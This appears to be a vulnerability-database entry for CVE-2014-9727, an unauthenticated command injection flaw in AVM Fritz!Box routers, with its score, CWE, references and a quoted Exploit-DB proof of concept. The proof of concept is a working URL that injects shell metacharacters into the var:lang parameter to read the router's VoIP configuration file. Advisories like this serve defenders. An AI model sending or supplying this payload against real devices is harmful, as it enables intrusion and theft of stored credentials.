CVE-2014-9727
critical
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
10.0
Description
AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Fritz!Box - Remote Command Execution
App : Fritz!Box
Author : 0x4148
Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw
Poc :
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26
#0x4148_riseMetasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| avm | fritz\!box | | |
References
- http://www.exploit-db.com/exploits/33136
- http://www.osvdb.org/103289
- https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--Fritz%21Box-%E2%80%93-Remote-Command-Execution-Exploit-Attempt/
- http://www.exploit-db.com/exploits/33136
- http://www.osvdb.org/103289
- https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--Fritz%21Box-%E2%80%93-Remote-Command-Execution-Exploit-Attempt/
CWEs
CWE-78
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.